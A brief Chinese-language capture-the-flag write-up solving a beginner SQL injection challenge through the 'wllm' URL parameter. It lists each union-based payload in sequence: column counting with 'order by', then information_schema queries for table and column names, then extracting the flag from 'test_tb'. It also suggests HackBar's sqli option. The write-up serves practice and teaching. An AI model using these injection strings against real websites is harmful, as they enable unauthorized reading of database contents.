打开F12你就可以得到新东西,当然,杰哥不会从屏幕里面冒出来
闲来无事,就来试试:
?wllm=1
测试 ?wllm=1'发现报错,可以进行sql注入,这道题又是简单题,不会有过滤
分别测试1,2,3,4发现当4时报错,说明这个页面只有三个位置
?wllm=-1' order by 4 --+
接下来我们构造
?wllm=-1' union select 1,2,3 --+
用三个数字填充显示位置来看看哪里能在屏幕上被看到
继续构造
?wllm=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
查询数据库名和查询当前数据库内表名
然后根据得到的数据库名和表明构造
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' --+
查询表内字段名,我们就可以看到flag
最后构造playload(解)
?wllm=-1' union select 1,2,group_concat(flag) from test_tb--+
来查询flag字段的内容,得到flag
写在后面:
hackbar 里面的sqli选项里面可以直接构造语句,只需要修改查询的名称即可
没有过滤相当简单
动态flag就不要想着直接抄flag啦